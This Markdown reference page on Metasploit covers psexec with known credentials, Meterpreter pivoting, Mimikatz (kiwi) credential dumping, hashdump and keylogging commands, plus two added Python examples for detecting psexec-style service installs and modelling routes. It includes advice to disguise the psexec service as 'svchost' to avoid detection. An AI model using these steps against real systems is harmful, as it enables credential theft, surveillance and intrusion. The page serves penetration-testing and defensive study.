# Metasploit

### Common Uses

Use the `exploit/multi/handler` module to catch reverse shells and manage several sessions at once. Make sure the handler is configured with the same payload the callback is using, or nothing will be caught.

Use the `exploit/windows/smb/psexec` module with known credentials to create easy Meterpreter sessions to pivot and exploit further. Set the `SERVICE_FILENAME` option to replace the random garbage name the module uses by default, because it's suspicious (using something like `svchost` helps hide!).
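The two things the paragraph above says give psexec away, a randomly named service and a service masquerading under a familiar name from the wrong path, are exactly what a defender looks for in the System log's service-install events (Event ID 7045). The following is an added example, not code from the page or from Metasploit: it runs two heuristics over a constructed, flattened set of 7045 records. The record layout, the `MASQUERADE_NAMES` list and the `looks_random` rules are assumptions made for the example and will produce some false positives on unusual legitimate service names.

```python
"""Flag Windows service-install events (Event ID 7045) that resemble the
services created by Metasploit's psexec module: a randomly generated service
name, or a well-known name whose binary lives outside the system directories.

Added example; the event dicts below are constructed, not real log data."""
import re

# Assumption: names an attacker is likely to borrow. A 7045 event with one of
# these as the service or binary name is suspicious unless the image path is
# under System32/SysWOW64.
MASQUERADE_NAMES = {"svchost", "lsass", "csrss", "winlogon", "services"}
SYSTEM_DIRS = re.compile(
    r"^(?:%systemroot%|c:\\windows)\\(?:system32|syswow64)\\", re.IGNORECASE)
VOWELS = set("aeiouAEIOU")


def looks_random(name: str) -> bool:
    """Heuristic for machine-generated alphabetic names (6-16 letters):
    either the name has no vowels at all, or it is mixed case with three or
    more interior capitals that do not start a lowercase word-run (so
    CamelCase names such as NetTcpPortSharing are left alone)."""
    if not (6 <= len(name) <= 16 and name.isalpha()):
        return False
    if not any(c in VOWELS for c in name):
        return True
    if name.islower() or name.isupper():
        return False
    odd_caps = 0
    for i in range(1, len(name)):
        if name[i].isupper() and not name[i + 1:i + 3].islower():
            odd_caps += 1
    return odd_caps >= 3


def classify_event(event: dict) -> list[str]:
    """Return the reasons an event is suspicious (empty list if it is not)."""
    if event.get("EventID") != 7045:
        return []
    reasons = []
    name = event.get("ServiceName", "")
    image = event.get("ImagePath", "").strip('"')
    # First token is the binary; arguments such as "-k netsvcs" are ignored.
    # (Unquoted paths containing spaces would need smarter splitting.)
    binary = image.split()[0] if image.split() else ""
    stem = re.split(r"[\\/]", binary)[-1].lower().removesuffix(".exe")
    if looks_random(name):
        reasons.append(f"random-looking service name {name!r}")
    if ((name.lower() in MASQUERADE_NAMES or stem in MASQUERADE_NAMES)
            and not SYSTEM_DIRS.match(binary)):
        reasons.append(f"{name!r} masquerades as a system binary from {binary!r}")
    return reasons


def scan_events(events: list[dict]) -> list[tuple[str, list[str]]]:
    """Return (service name, reasons) for every flagged install event."""
    flagged = []
    for event in events:
        reasons = classify_event(event)
        if reasons:
            flagged.append((event.get("ServiceName", ""), reasons))
    return flagged


# Constructed sample records, flattened to one dict per event.
SAMPLE_EVENTS = [
    {"EventID": 7045, "ServiceName": "Spooler",
     "ImagePath": r"C:\Windows\System32\spoolsv.exe", "AccountName": "LocalSystem"},
    {"EventID": 7045, "ServiceName": "MqXzKwpL",
     "ImagePath": r"%SystemRoot%\MqXzKwpL.exe", "AccountName": "LocalSystem"},
    {"EventID": 7045, "ServiceName": "svchost",
     "ImagePath": r"C:\Windows\svchost.exe", "AccountName": "LocalSystem"},
    {"EventID": 7045, "ServiceName": "wuauserv",
     "ImagePath": r"%SystemRoot%\System32\svchost.exe -k netsvcs",
     "AccountName": "LocalSystem"},
    # Not an install event, so it is ignored even though the name is odd.
    {"EventID": 7036, "ServiceName": "MqXzKwpL", "ImagePath": "", "AccountName": ""},
]

if __name__ == "__main__":
    for service, reasons in scan_events(SAMPLE_EVENTS):
        print(service, "->", "; ".join(reasons))
```

Only the random-named service and the out-of-place `svchost` are reported; the genuine `wuauserv` entry, which is hosted by the real `System32\svchost.exe`, is not. Wiring this to a real log source means replacing `SAMPLE_EVENTS` with parsed 7045 events.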

### Meterpreter

A payload with a feature-rich shell: a series of DLLs injected into a process's memory that never touches the disk and creates no separate process. All Meterpreter communications are TLS encrypted unless specifically told not to.

```bash
# Below adds a port forward: localhost:1234 -> meterpreter -> 10.0.0.1:22
meterpreter > portfwd add -l 1234 -p 22 -r 10.0.0.1

# Below adds a route to send all traffic for a subnet through Meterpreter session #1
msf > route add [subnet] [netmask] [session id]
msf > route add 10.0.1.0 255.255.255.0 1    # routes 10.0.1.0/24 through session 1
msf > route add 10.0.0.5 255.255.255.255 1  # routes the single host 10.0.0.5 through session 1
```
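The `route add` lines above behave like an ordinary routing table: each entry is a network plus the session that carries it, and the most specific matching entry wins. The following is an added example, not Metasploit code, that parses the same `route add <subnet> <netmask> <session id>` syntax and resolves destinations with longest-prefix matching; the route list and destinations are constructed for the example.

```python
"""Model the msf `route add` table as longest-prefix matching, so the effect of
overlapping routes (a /24 through one session, a /25 inside it through another)
is explicit. Added example, not part of the framework."""
import ipaddress


def parse_route(line: str) -> tuple[ipaddress.IPv4Network, int]:
    """Parse 'route add 10.0.1.0 255.255.255.0 1' into (network, session id)."""
    parts = line.split()
    if parts[:2] != ["route", "add"] or len(parts) != 5:
        raise ValueError(f"not a route add command: {line!r}")
    subnet, netmask, session = parts[2:]
    # ipaddress accepts a dotted netmask after the slash; strict=True rejects
    # a subnet with host bits set, which is a typo worth catching early.
    network = ipaddress.ip_network(f"{subnet}/{netmask}", strict=True)
    return network, int(session)


def build_table(lines: list[str]) -> list[tuple[ipaddress.IPv4Network, int]]:
    return [parse_route(line) for line in lines]


def lookup(table, dest: str):
    """Return the session id that would carry traffic to dest, or None when
    no route covers it. The longest prefix (most specific route) wins."""
    addr = ipaddress.ip_address(dest)
    best = None
    for network, session in table:
        if addr in network and (best is None or network.prefixlen > best[0].prefixlen):
            best = (network, session)
    return None if best is None else best[1]


# Constructed routes: the page's two entries plus a more specific /25 through
# a second session to show longest-prefix matching.
ROUTE_LINES = [
    "route add 10.0.1.0 255.255.255.0 1",
    "route add 10.0.0.5 255.255.255.255 1",
    "route add 10.0.1.128 255.255.255.128 2",
]
TABLE = build_table(ROUTE_LINES)

if __name__ == "__main__":
    for dest in ("10.0.1.7", "10.0.1.200", "10.0.0.5", "10.0.0.6", "192.168.1.1"):
        print(f"{dest:>12} -> session {lookup(TABLE, dest)}")
```

`10.0.1.7` resolves to session 1, `10.0.1.200` to session 2 because the /25 is more specific, `10.0.0.5` to session 1 via its host route, and `10.0.0.6` to no session at all, which is the usual reason a pivoted scan silently reaches nothing.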

#### Managing Meterpreter Sessions

Sessions are listed and managed with the `sessions -l` command. Channels inside a session are managed with the `channels -l` command. Upgrade an existing plain shell to Meterpreter with `sessions -u 1`.

`CTRL-Z` will background a channel or session.

Load additional modules with `use [module name]`.

#### Mimikatz in Meterpreter

We can load Mimikatz directly into a running Meterpreter session, giving us serious power. We need to be running as `SYSTEM`, and we need to make sure the process we're in has the same architecture as the host.

Check whether the architectures match with `sysinfo`: the `Architecture` and `Meterpreter` fields must agree. If we need to move, find running processes with the correct architecture that are also running as `SYSTEM` with `ps -A x64 -s`, then move with `migrate [PID]`. Validate that the architecture and Meterpreter types match by running `sysinfo` again.

Now we can load the Mimikatz extension with `load kiwi`. Running `help` will show the new Mimikatz commands we can use. Running `creds_all` will dump all available hashes and plaintext passwords!

#### Meterpreter Commands

| Command | Function |
| --- | --- |
| `help` | Shows all available commands |
| `sysinfo` | Shows computer name, OS, architecture, and kernel information |
| `shell` | Launch a command shell on the host |
| `getpid` | Show the process ID of the current Meterpreter process |
| `getuid` | Show the user ID Meterpreter is running under |
| `ps` | List processes |
| `migrate` | Attempt to move into a different process |
| `cd` / `lcd` | Change directory on the host / locally |
| `ls` / `lls` | List directory contents on the host / locally |
| `download` | Download a file from the host |
| `upload` | Upload a file to the host |
| `edit` | Edit a file using vi or nano |
| `ipconfig` | Show host networking information |
| `route` | Display, add, or delete entries in the host routing table |
| `portfwd` | Forward traffic to another location as a TCP relay |
| `creds_all` | Dump credentials via the kiwi (Mimikatz) extension |
| `hashdump` | Gather hashes from host memory; requires SYSTEM privileges |
| `run hashdump` | Pulls hashes from the registry (SAM and SYSKEY) |
| `run post/windows/gather/smart_hashdump` | Gathers hashes from NTDS.dit and the SAM on disk |
| `run post/windows/gather/hashdump` | Pulls hashes from the registry (SAM and SYSKEY) |
| `screenshot -p /tmp/screen.jpg` | Grab a screenshot of the desktop |
| `uictl` | Turn user input devices on or off |
| `webcam_list` / `webcam_snap` | List the webcams available to the host and take a snapshot |
| `keyscan_start` / `keyscan_dump` / `keyscan_stop` | Keystroke logger that gathers input as it is typed |

### Arsenal

Metasploit is a modular combination of scanners, exploits, payloads, and post modules, driven through several user interfaces.

| User Interface | Purpose                                                                          |
| -------------- | -------------------------------------------------------------------------------- |
| `msfconsole`   | Basic MSF prompt for exploitation                                                |
| `msfd`         | Daemon listening on TCP 55554 that gives msfconsole access to anyone who connects |
| `msfrpcd`      | XMLRPC controlled MSF, default TCP 55553 using SSL                               |
| `msfcli`       | MSF with all options specified in a single command, useful for scripting         |
| `msfvenom`     | Used to generate malicious payloads and binaries                                 |

### Modules

| Module Name | Purpose                                                    |
| ----------- | ---------------------------------------------------------- |
| `auxiliary` | Port scanners, DoS tools, login checks, etc                |
| `encoders`  | Convert exploits and payloads to attempt to bypass filters |
| `exploits`  | Exploits used to attack a system                           |
| `nops`      | Create NOP sleds                                           |
| `payloads`  | Huge list of payloads based on system and type             |
| `post`      | Post-exploitation modules to further exploit a system      |

### Troubleshooting

Having issues importing a module? Make sure you check the logs at `~/.msf4/logs/framework.log`.
